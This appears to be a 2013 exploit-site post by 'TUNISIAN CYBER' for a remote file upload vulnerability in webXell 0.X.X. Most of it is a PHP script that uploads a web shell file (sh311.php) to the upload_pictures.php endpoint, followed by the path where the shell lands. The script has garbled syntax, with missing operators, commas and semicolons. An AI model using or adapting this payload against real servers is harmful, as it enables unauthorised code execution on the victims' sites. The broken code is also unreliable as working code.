facebook facebook twitter rss

webXell 0.X.X Remote Upload Vulnerability

Author: TUNISIAN CYBER , Published: 16-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: webXell 0.X.X Remote Upload Vulnerability
[+] Date: 16-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/webxelleditor/files/
[+] Google Dork: n/a
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
Expl01t in PHP:
<?php
echo "============================================ \n"
echo 
":   webXell Exploiter by TUNISIAN CYBER      :\n"
echo 
"============================================ \n\n"
$uploadfile="sh311.php";
$ch curl_init("http://127.0.0.1/webXell/upload_pictures.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('file'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>


shell path:
http://127.0.0.1/webXell/upload/[3v1l]

p0c>http://oi43.tinypic.com/9r4vh2.jpg
http://oi39.tinypic.com/28048yg.jpg
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt,sec4ever

Like us on Facebook :